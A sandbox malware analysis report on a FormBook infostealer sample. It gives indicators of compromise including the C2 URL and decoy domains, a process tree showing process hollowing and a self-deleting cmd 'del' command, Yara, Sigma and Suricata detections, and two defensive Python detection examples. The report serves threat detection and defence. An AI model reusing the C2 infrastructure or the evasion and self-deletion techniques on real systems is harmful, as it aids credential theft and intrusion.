Windows Analysis Report
PI916810.exe

Overview

General Information

Sample name: PI916810.exe
Analysis ID: 1548156
MD5: dc96f5ae5ade3e42324fa9c34bc6a43d
SHA1: 4a882ad9ad5e3c18635c6bcebd829c7f5e4d503a
SHA256: 63cfb08a37c680b7bd8c3a16340a69f92e1837b9ec57104e1f826c675316e278
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to resolve many domain names, but no domain seems valid
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PI916810.exe (PID: 1856 cmdline: "C:\Users\user\Desktop\PI916810.exe" MD5: DC96F5AE5ADE3E42324FA9C34BC6A43D)
    • svchost.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\PI916810.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • WWAHost.exe (PID: 616 cmdline: "C:\Windows\SysWOW64\WWAHost.exe" MD5: 7C7EDAD5BDA9C34FD50C3A58429C90F0)
          • cmd.exe (PID: 6760 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
{"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
      • 0x18809:$sqlite3step: 68 34 1C 7B E1
      • 0x1891c:$sqlite3step: 68 34 1C 7B E1
      • 0x18838:$sqlite3text: 68 38 2A 90 C5
      • 0x1895d:$sqlite3text: 68 38 2A 90 C5
      • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
(33 further entries not shown)

Source: 0.2.PI916810.exe.1a00000.1.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0.2.PI916810.exe.1a00000.1.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
Source: 0.2.PI916810.exe.1a00000.1.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source: 0.2.PI916810.exe.1a00000.1.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0.2.PI916810.exe.1a00000.1.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          • 0x17a09:$sqlite3step: 68 34 1C 7B E1
          • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a38:$sqlite3text: 68 38 2A 90 C5
          • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
(15 further entries not shown)
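The rule strings listed above are fixed byte sequences; a match is nothing more than those bytes present at some offset of the dumped region. The following is an added example, not Joe Sandbox, Elastic, yara-signator or JPCERT code, that scans a buffer for the same sequences in pure Python and decodes the push-immediate strings of the JPCERT rule, so the offsets the report prints can be reproduced against a dump without a yara install. The buffer it scans is constructed here, so the offsets it reports are its own, not the sample's.

```python
"""Scan a memory buffer for the byte strings printed in the Yara rule matches.

Added example for this page, not Joe Sandbox, Elastic, yara-signator or
JPCERT code. The patterns are copied from the rule strings in the report;
the buffer is constructed so the example runs offline, so the offsets it
returns belong to the constructed buffer, not to the sample's dump.
"""
from __future__ import annotations

import struct

# Rule strings exactly as printed in the report, keyed "rule/$variable".
PATTERNS: dict[str, bytes] = {
    # contains the ASCII bytes "POST" (50 4F 53 54) inside the HTTP code
    "Windows_Trojan_Formbook_1112e116/$a1": bytes.fromhex("3C 30 50 4F 53 54 74 09 40"),
    # 0F 31 is rdtsc, consistent with the report's RDTSC timing signature
    "Formbook_1/$sequence_0": bytes.fromhex("03 C8 0F 31 2B C1 89 45 FC"),
    # 68 imm32 is `push imm32`; the rule names these as sqlite3 API lookups
    "Formbook/$sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "Formbook/$sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "Formbook/$sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}


def scan(buf: bytes, patterns: dict[str, bytes] = PATTERNS) -> dict[str, list[int]]:
    """Return every offset at which each pattern occurs (overlaps included)."""
    hits: dict[str, list[int]] = {}
    for name, pat in patterns.items():
        offsets, pos = [], buf.find(pat)
        while pos != -1:
            offsets.append(pos)
            pos = buf.find(pat, pos + 1)
        hits[name] = offsets
    return hits


def push_imm32(seq: bytes) -> int | None:
    """Decode a 5-byte `push imm32` (opcode 0x68, little-endian immediate)."""
    if len(seq) == 5 and seq[0] == 0x68:
        return struct.unpack("<I", seq[1:])[0]
    return None


def pushed_hashes(patterns: dict[str, bytes] = PATTERNS) -> dict[str, int]:
    """Immediates carried by the push-style rule strings, e.g. $sqlite3step."""
    return {n: v for n, p in patterns.items() if (v := push_imm32(p)) is not None}


def build_sample_buffer() -> tuple[bytes, dict[str, list[int]]]:
    """Constructed 1 KiB buffer: arithmetic filler (consecutive bytes always
    differ by 7, so it never matches a rule string by accident) with the rule
    strings planted at known offsets; the second value is the expected hits."""
    layout = [
        ("Windows_Trojan_Formbook_1112e116/$a1", 0x40),
        ("Formbook_1/$sequence_0", 0x100),
        ("Formbook_1/$sequence_0", 0x140),  # the report shows this one twice
        ("Formbook/$sqlite3step", 0x200),
        ("Formbook/$sqlite3text", 0x220),
        ("Formbook/$sqlite3blob", 0x240),
        ("Formbook/$sqlite3step", 0x300),
    ]
    buf = bytearray((i * 7 + 3) & 0xFF for i in range(0x400))
    expected: dict[str, list[int]] = {name: [] for name in PATTERNS}
    for name, off in layout:
        pat = PATTERNS[name]
        buf[off:off + len(pat)] = pat
        expected[name].append(off)
    return bytes(buf), expected


def report(buf: bytes) -> list[str]:
    """Lines in the report's own "0xOFFSET:$name: HEX" form."""
    lines = []
    for name, offs in scan(buf).items():
        var = name.split("/")[1]
        for off in offs:
            lines.append(f"0x{off:x}:{var}: {PATTERNS[name].hex(' ').upper()}")
    return lines


if __name__ == "__main__":
    sample, _ = build_sample_buffer()
    for line in report(sample):
        print(line)
    for name, imm in pushed_hashes().items():
        print(f"{name} pushes 0x{imm:08X}")
```

Point `scan()` at the bytes of a process dump instead of the constructed buffer to reproduce the offsets in the report; the `$sqlite3*` immediates it decodes are the values FormBook pushes when it resolves the sqlite3 routines it uses for credential-store parsing, which is why those five-byte strings are stable across samples.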

          System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\PI916810.exe", CommandLine: "C:\Users\user\Desktop\PI916810.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI916810.exe", ParentImage: C:\Users\user\Desktop\PI916810.exe, ParentProcessId: 1856, ParentProcessName: PI916810.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI916810.exe", ProcessId: 6300, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\PI916810.exe", CommandLine: "C:\Users\user\Desktop\PI916810.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PI916810.exe", ParentImage: C:\Users\user\Desktop\PI916810.exe, ParentProcessId: 1856, ParentProcessName: PI916810.exe, ProcessCommandLine: "C:\Users\user\Desktop\PI916810.exe", ProcessId: 6300, ProcessName: svchost.exe
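The two Sigma matches above carry the fields (Image, CommandLine, ParentImage, process IDs) needed to spot this pattern in endpoint telemetry: an svchost.exe whose parent is the dropped sample and whose command line is the sample's, not svchost's. The following is an added example, written for this page and neither the Sigma rule nor Joe Sandbox code, that evaluates process-creation events built from those fields and the report's process tree. It flags svchost.exe started by anything other than services.exe (an assumed simplification of the rule's real exclusion list), a command line whose argv[0] names a different image than the one running (the hollowed svchost.exe carries the dropper's command line), and a cmd.exe /c del aimed at a binary under the Windows system directories. The cmd.exe image path is assumed, since the report prints only its command line.

```python
"""Evaluate process-creation events for the pattern the Sigma matches describe.

Added example for this page; it is neither the Sigma rule nor Joe Sandbox
code. Events are constructed from the report's process tree and Sigma event
fields. Assumptions: cmd.exe's image path (the report prints only its command
line) and that services.exe is the only normal parent of svchost.exe (a
simplification of the rule's real exclusion list).
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_pid: int | None = None
    parent_image: str | None = None


# Constructed from the report; explorer.exe (PID 1028) already existed and
# is therefore only referenced as a parent, not logged as a start event.
EVENTS = [
    ProcessEvent(1856, r"C:\Users\user\Desktop\PI916810.exe",
                 r'"C:\Users\user\Desktop\PI916810.exe"'),
    ProcessEvent(6300, r"C:\Windows\SysWOW64\svchost.exe",
                 r'"C:\Users\user\Desktop\PI916810.exe"',
                 1856, r"C:\Users\user\Desktop\PI916810.exe"),
    ProcessEvent(616, r"C:\Windows\SysWOW64\WWAHost.exe",
                 r'"C:\Windows\SysWOW64\WWAHost.exe"',
                 1028, r"C:\Windows\Explorer.EXE"),
    ProcessEvent(6760, r"C:\Windows\SysWOW64\cmd.exe",  # image path assumed
                 r'/c del "C:\Windows\SysWOW64\svchost.exe"',
                 616, r"C:\Windows\SysWOW64\WWAHost.exe"),
    ProcessEvent(2672, r"C:\Windows\system32\conhost.exe",
                 r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
                 6760, r"C:\Windows\SysWOW64\cmd.exe"),
]

NORMAL_SVCHOST_PARENTS = {"services.exe"}  # assumption, see module docstring
WINDOWS_BIN_DIR = re.compile(r"\\windows\\(system32|syswow64)\\", re.I)


def basename(path: str | None) -> str:
    return ntpath.basename(path or "").lower()


def first_token(cmdline: str) -> str:
    """argv[0] of a Windows command line, honouring a quoted first token."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(None, 1)[0] if s else ""


def evaluate(ev: ProcessEvent) -> list[str]:
    findings: list[str] = []
    image = basename(ev.image)
    if image == "svchost.exe" and basename(ev.parent_image) not in NORMAL_SVCHOST_PARENTS:
        findings.append("svchost_uncommon_parent")
    argv0 = first_token(ev.command_line)
    # Compare only when argv[0] is present: some sources (this report's
    # cmd.exe line) log the arguments alone, which must not read as a mismatch.
    if argv0.lower().endswith(".exe") and basename(argv0) != image:
        findings.append("cmdline_image_mismatch")  # hollowed-process indicator
    if (image == "cmd.exe" and re.search(r"\bdel\b", ev.command_line, re.I)
            and WINDOWS_BIN_DIR.search(ev.command_line)):
        findings.append("cmd_del_windows_binary")
    return findings


def evaluate_all(events: list[ProcessEvent]) -> dict[int, list[str]]:
    return {ev.pid: f for ev in events if (f := evaluate(ev))}


def ancestry(pid: int, events: list[ProcessEvent]) -> list[str]:
    """Image basenames from the oldest known ancestor down to `pid`."""
    by_pid = {ev.pid: ev for ev in events}
    chain: list[str] = []
    ev = by_pid[pid]
    while True:
        chain.append(basename(ev.image))
        if ev.parent_pid in by_pid:
            ev = by_pid[ev.parent_pid]
            continue
        if ev.parent_image:
            chain.append(basename(ev.parent_image))
        break
    return chain[::-1]


if __name__ == "__main__":
    for pid, findings in evaluate_all(EVENTS).items():
        print(pid, " > ".join(ancestry(pid, EVENTS)), findings)
```

The argv[0]-versus-image comparison is the cheap hollowing tell here: a legitimately started svchost.exe is launched with a command line that names svchost.exe, whereas a process created suspended and overwritten keeps the command line of whatever created it.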
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-04T03:14:22.217043+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49706 | TCP
2024-11-04T03:15:01.278188+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.5 | 49902 | TCP
2024-11-04T03:14:39.357291+0100 | 2031453 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49796 | 199.59.243.227 | 80 | TCP


          AV Detection

Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.9net88.net/ge07/"], "decoy": ["amyard.shop", "eloshost.xyz", "g18q11a.top", "orensic-vendor-735524320.click", "ithin-ksvodn.xyz", "xhyx.top", "elonix-traceglow.pro", "cillascrewedsedroth.cfd", "wner-nyquh.xyz", "reyhazeusa.shop", "esmellretaperetotal.cfd", "hqm-during.xyz", "pipagtxcorrelo.xyz", "lray-civil.xyz", "apybarameme.xyz", "rbuds.shop", "hild-fcudh.xyz", "rkgexg.top", "estwestcottwines.shop", "giyztm.xyz", "epehr.pics", "lways-vhyrp.xyz", "acifictechnologycctv.net", "iscinddocenaemlynne.cfd", "ridesmaidgiftsboutiqueki.shop", "ubtleclothingco.fashion", "hemicans.xyz", "ebaoge318.top", "zoc-marriage.xyz", "ngeribe2.homes", "oal-ahzgwo.xyz", "eries-htii.xyz", "ool-covers76.xyz", "ecurityemployment.today", "croom.net", "f7y2i9fgm.xyz", "earch-lawyer-consultation.today", "066iwx2t.shop", "ound-omagf.xyz", "ivglass.xyz", "fdyh-investment.xyz", "yegle.net", "eader-aaexvn.xyz", "dvle-father.xyz", "onsfskfsmpfssfpewqdsawqe.xyz", "ffect-xedzl.xyz", "ood-packaging-jobs-brasil.today", "lasterdeals.shop", "ehkd.top", "pm-22-ns-2.click", "ocockbowerlybrawer.cfd", "ostcanadantpl.top", "vrkof-point.xyz", "lsader.app", "nce-ystyx.xyz", "azl.pro", "ea-yogkkb.xyz", "isit-txax.xyz", "rowadservepros.net", "6282.xyz", "roduct-xgky.xyz", "wner-nyquh.xyz", "sfmoreservicesllc.lat", "rasko.net"]}
Source: PI916810.exe | ReversingLabs: Detection: 28%
Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.PI916810.exe.1a00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: PI916810.exe | Joe Sandbox ML: detected
Source: PI916810.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: WWAHost.pdb source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: WWAHost.pdbUGP source: svchost.exe, 00000002.00000003.2090463981.0000000005800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090278190.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091961931.00000000056A0000.00000040.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486561760.0000000000260000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: PI916810.exe, 00000000.00000003.2031252239.0000000003650000.00000004.00001000.00020000.00000000.sdmp, PI916810.exe, 00000000.00000003.2034353437.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2032652059.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2035726323.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2091374646.0000000003900000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.0000000003330000.00000040.00001000.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2092837599.0000000003187000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000003.2091092274.0000000002FDF000.00000004.00000020.00020000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4487488346.00000000034CE000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4499137007.0000000010E4F000.00000004.80000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4488075149.000000000387F000.00000004.10000000.00040000.00000000.sdmp, WWAHost.exe, 00000004.00000002.4486940710.00000000028CD000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004C4696
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CC93C FindFirstFileW,FindClose,0_2_004CC93C
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004CC9C7
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF200
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004CF35D
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CF65E
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3A2B
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004C3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004C3D4E
Source: C:\Users\user\Desktop\PI916810.exe | Code function: 0_2_004CBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004CBF27

          Networking

Source: Network traffic | Suricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49796 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49796 -> 199.59.243.227:80
Source: Network traffic | Suricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.5:49796 -> 199.59.243.227:80
Source: C:\Windows\explorer.exe | Network Connect: 199.59.243.227 80
Source: Malware configuration extractor | URLs: www.9net88.net/ge07/
          Source: DNS query: www.eloshost.xyz
          Source: DNS query: www.lray-civil.xyz
          Source: DNS query: www.ool-covers76.xyz
          Source: DNS query: www.ithin-ksvodn.xyz
